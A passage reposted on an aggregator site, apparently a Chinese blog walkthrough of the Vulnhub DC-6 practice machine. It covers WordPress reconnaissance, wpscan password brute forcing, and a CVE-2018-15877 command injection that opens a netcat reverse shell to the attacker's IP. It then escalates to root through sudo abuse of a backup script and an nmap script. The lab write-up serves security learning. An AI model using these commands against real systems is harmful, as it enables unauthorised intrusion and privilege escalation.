dc-6靶机

这篇具有很好参考价值的文章主要介绍了dc-6靶机。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.使用nmap进行信息搜集,存活主机,端口
192.168.85.184是存活主机,发现开放22,80端口
2.访问192.168.85.184的80端口
发现被重定向了,修改hosts文件

vim /etc/hosts
添加一行
192.168.85.174 wordy

3.对网站进行信息搜集并进行相关利用
找到一段信息
dc-6靶机
dc-6靶机
主要是说插件安全的问题,估计利用wordpress插件的漏洞
访问http://192.168.85.184/wp-includes,发现目录遍历,找到一些插件,尝试搜索相关漏洞利用,失败的
dc-6靶机
cms通过观察是wordpress,要知道wordpress有哪些漏洞就要知道版本
dc-6靶机
使用dirb对目录进行扫描

dirb http://192.168.85.184/

发现后台目录/wp-admin
尝试弱口令,失败
尝试sql注入,万能密码失败
4.使用wpscan对网站进行扫描
知道wordpress有哪些漏洞就要知道版本
扫描出版本 5.1.1,没找到漏洞
做靶机时要看一下官网描述
官网描述
dc-6靶机
只有一个flag,在root目录里
官网线索
dc-6靶机
主要说使用这个命令会节省你的时间
5.使用wpscan进行爆破
扫描用户名并写入user.txt

wpscan --url http://192.168.85.184 -e u

dc-6靶机
5个用户名写入user.txt
admin
mark
graham
sarah
jens
密码字典

gunzip rockyou.txt.gz           #解压
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破

wpscan --url http://192.168.85.184 -U user.txt -P pass.txt

用户名 mark
密码 helpdesk01
dc-6靶机
6.登录后台,寻找可以利用点
登录成功
在一些wordpress版本中,是可以上传插件和主题的,可以在这个地方直接上传一句话木马,注意上传插件时可能会失败,但是当你查看文件时时上传成功的,因为上传插件时是先上传在解压安装的,之后可以在msf的php或linux马继续上线,进行下一步操作
没有发现上传的位置
dc-6靶机

发现一个插件,搜索相关漏洞
找到CVE-2018-15877,是命令执行漏洞

7.利用cve-2018-15877
在 Activity Monito的tools处有命令执行
dc-6靶机
在3处输入命令,在4处点击执行,3处有长度限制,f12修改最大长度
有两个思路
写一句话木马
反弹shell
写一句话木马失败,可能是权限问题
3处反弹shell

127.0.0.1|nc -e /bin/bash 192.168.85.129 4455

kali nc监听

nc -lvnp 4455
python进入交互式会话
python -c ’import pty;pty.spawn("/bin/bash")'

成功反弹
dc-6靶机
8.对主机进行信息搜集,进行提权
查看内核版本,版本是4.0的版本,太高没有找到漏洞

uname -a

当前权限www-data
把有权限的地方都看一看
进入家目录
进入到jens的家目录,发现一个备份backups.sh,查看内容,是打包web根目录下的文件
dc-6靶机
这个地方想到了linux提权中的打包提权,查看权限是jens权限,不是root权限
查找suid权限,发现sudo

sudo -l #查看当前用户的一些sudo权限

继续搜集
进入mark家目录,发现graham密码
dc-6靶机
username:graham
passwd:GSo7isUM1D4
9.使用graham用户登录ssh或su 切换用户
ssh 192.168.85.184 -l graham
GSo7isUM1D4
dc-6靶机
执行下面命令发现可以jens执行backups.sh

sudo -l

dc-6靶机
可以不需要jens密码以jens权限执行backups.sh

当写入赋予find的s权限,在作为打包命令执行的参数执行前面的命令执行时,是不能执行的,因为sudo文件的一些命令被禁止了以root权限执行
dc-6靶机
有一个思路看一下其他用户登录时sudo -l可以执行什么,但是使用前面搜集的两个密码登录都失败了
还有一个思路可以写入/bin/bash,sudo可以切换到jens用户

echo '/bin/bash'>>/home/jens/backups.sh
#sudo -u以指定用户执行
sudo -u jens ./home/jens/backups.sh

成功切换到jens用户
dc-6靶机
10.nmap提权
执行以下命令,发现可以不需要密码以root执行nmap命令

sudo -l

dc-6靶机
写一个bash,以root权限执行

echo 'os.execute('/bin/bash')' >1.nse
sudo nmap --script=1.nse
id

dc-6靶机
参考文章:
dc-6文章来源地址https://www.toymoban.com/news/detail-429666.html

到了这里,关于dc-6靶机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1靶机渗透思路及方法(个人分享) 靶机下载地址: https://download.vulnhub.com/dc/DC-1.zip 靶机地址:192.168.67.28 攻击机地址:192.168.67.3 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用  nmap  工具扫描靶机开放端口、服务版本

    2024年01月20日
    浏览(115)
  • DC-4靶机刷题记录

    靶机下载地址: 参考: 【【基础向】超详解vulnhub靶场DC-4-爆破+反弹shell+信息收集】 https://www.bilibili.com/video/BV1Le4y1o7Sx/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef http://t.yssmx.com/BOGVr http://t.yssmx.com/tRrgh DC-4 (1).pdf https://c3ting.com/archives/vulnhnbshua-ti-dc-4 https://www.vulnhub.com/entr

    2024年01月20日
    浏览(34)
  • DC-6靶机测试渗透详细教程

    1、首先扫描我们要渗透机器的IP 2、 接着我们扫描IP的端口和操作系统  我们扫到目标机的80端口开启了,我们进行查看目标机的80端口。(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和域名进行绑定,然后再进行访问      发现没有任何注入点 3、接着我

    2024年02月17日
    浏览(36)
  • DC-1靶机渗透测试详细教程

    DC-1下载:https://download.vulnhub.com/dc/DC-1.zip 攻击者kali   IP:192.168.1.9 受害者DC-1   IP:192.168.1.8 将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。 1 使用命令 arp-scan -l 列出当前局域网的所有设备

    2024年02月08日
    浏览(31)
  • DC-7靶机做题记录

    靶机下载地址: 参考: DC7靶机地址:http://www.five86.com/downloads/DC-7.zip DC7靶场介绍: https://www.vulnhub.com/entry/dc-7,356/ php插件地址:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz 【DC系列靶机DC7通关讲解】 https://www.bilibili.com/video/BV1f8411T7As/?share_source=copy_webvd_source=12088c39299ad03109d9a

    2024年01月22日
    浏览(35)
  • DC-1靶机渗透(教程以及思路)

    一:信息搜集 首先第一步就是使用fping来查看靶机的ip 使用命令fping -aqg ip 使用nmap -sS -p-进行扫描 发现开启了4个端口,分别是22,80,111,45186 再使用nmap的-sV扫描详细信息进行扫描,查看版本号判断是否存在漏洞 二:思路 一般来说这样的端口,我会先从80端口开始,看是否存

    2023年04月08日
    浏览(37)
  • DC-5靶机做题记录

    靶机下载地址: 参考: DC5官方地址:https://www.vulnhub.com/entry/dc-5,314/ DC5靶机地址:https://download.vulnhub.com/dc/DC-5.zip DC-5 (1).pdf 【DC系列靶机DC5通关讲解】 https://www.bilibili.com/video/BV1Bj411N74r/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef ChatGPT 描述: 1、导入VMware虚拟机 2、拍摄快

    2024年01月22日
    浏览(39)
  • DC-6靶机做题记录

    靶机下载地址: 参考: DC6靶场介绍:https://www.vulnhub.com/entry/dc-6,315/ 靶机:http://www.five86.com/downloads/DC-6.zip DC-6 (1).pdf https://wpscan.com/ 【网安神器篇】——WPScan漏洞扫描工具-CSDN博客 ChatGPT 【DC系列靶机DC6通关讲解】 https://www.bilibili.com/video/BV1eA411U7ox/?share_source=copy_webvd_source=12088c

    2024年01月23日
    浏览(39)
  • DC-3靶机刷题记录

    靶机下载地址: 参考: https://www.vulnhub.com/entry/dc-32,312/ 官网 DC-3 (1).pdf https://c3ting.com/archives/vulnhnbshua-ti—dc-3 【【基础向】超详解vulnhub靶场DC-3-一靶多打】 https://www.bilibili.com/video/BV11a411d78T/?share_source=copy_webvd_source=12088c39299ad03109d9a21304b34fef ChatGPT 当出现DE 设备 (磁盘/CD-ROM)配置不

    2024年01月20日
    浏览(40)
  • Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现

    2024年02月09日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包